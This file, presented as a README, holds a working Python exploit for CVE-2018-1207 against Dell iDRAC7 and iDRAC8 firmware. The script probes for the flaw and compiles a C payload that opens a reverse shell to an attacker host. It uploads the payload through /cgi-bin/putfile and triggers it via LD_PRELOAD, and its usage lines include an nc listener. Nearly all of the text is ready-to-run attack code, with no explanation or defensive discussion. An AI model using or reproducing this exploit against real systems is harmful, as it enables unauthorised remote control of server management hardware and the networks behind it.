README.md
Rendering markdown...
# Dell iDRAC7 and iDRAC8 Devices Code Injection Vulnerability (RCE)
# Vulnerable version firmware: < 2.52.52.52
# CVE number: CVE-2018-1207
import requests
import sys
import os
import re
import struct
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
print("""
___ _ _ ____ ____ __ __ ____ __ ____ __ ____
/ __)/ )( \( __)___(___ \ / \ / \/ _ \ ___ / \(___ \ / \(__ )
( (__ \ \/ / ) _)(___)/ __/( 0 )(_/ /) _ ((___)(_/ / / __/( 0 ) / /
\___) \__/ (____) (____) \__/ (__)\____/ (__)(____) \__/ (_/
""")
try:
host = sys.argv[1:][0]
port = sys.argv[1:][1]
lhost = sys.argv[1:][2]
lport = sys.argv[1:][3]
except:
print("Usage: python ./CVE-2018-1207.py <remote_host> <remote_port> <local_host> <local_port> ")
print(" python ./CVE-2018-1207.py 192.168.1.10 443 192.168.1.200 5500")
print(" nc -v -l -p <local_port> ")
exit()
payloadbin = 'payload.so'
payloadc = 'payload.c'
timeout = 10
url = 'https://' + str(host) + ':' + str(port)
try:
r = requests.get(url + '/cgi-bin/login?LD_DEBUG=files', verify=False, timeout=timeout)
except:
print("An error connecting to the server " + str(url))
exit()
vul = re.search(r'calling init: /lib/', r.text)
if vul:
print('[+] Server ' + str(url) + ' is vulnerable')
else:
print('[-] Server ' + str(url) + ' is not vulnerable')
exit()
print("Generate Payload")
if os.path.exists(payloadc):
os.unlink(payloadc)
payload = ("""
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
static void main(void) __attribute__((constructor));
static void main(void)
{
int pid = fork();
if(!pid) {
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in serv_addr = {0};
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(%d);
serv_addr.sin_addr.s_addr = inet_addr("%s");
connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/sh", "/bin/sh", NULL);
}
}
""") % (int(lport), lhost)
with open(payloadc, 'w') as file:
file.write(payload)
if os.path.exists(payloadc):
cmd = os.system('sh4-linux-gnu-gcc-11 -shared -fPIC ./payload.c -o ./payload.so')
exit_code = os.WEXITSTATUS(cmd)
if exit_code == 0:
print("[+] Generated payload.")
else:
print("[!] Error generate payload. Need the package gcc-11-sh4-linux-gnu (apt-get install gcc-11-sh4-linux-gnu).")
exit()
else:
print("[!] Error generate payload. Please check the permissions and owner of that directory.")
exit()
FFLAGS = 1
f = open(payloadbin, 'rb')
payload_so = f.read()
f.close()
f_alias = 'RACPKSSHAUTHKEY1'
res = bytes((f_alias + (32 - len(f_alias)) * '\0'),'utf-8')
res += struct.pack('<L', len(payload_so))
res += struct.pack('<L', FFLAGS)
res += payload_so
print("Upload payload")
r = requests.post(url + '/cgi-bin/putfile', data=res, verify=False, timeout=timeout)
if r.status_code == 200:
print("[+] OK")
else:
print("Failed upload Payload")
exit()
print("Start shell.")
r = requests.get(url + '/cgi-bin/discover?LD_PRELOAD=/tmp/sshpkauthupload.tmp', verify=False, timeout=timeout)
print("Good luck!")
if os.path.exists(payloadc):
os.unlink(payloadc)
if os.path.exists(payloadbin):
os.unlink(payloadbin)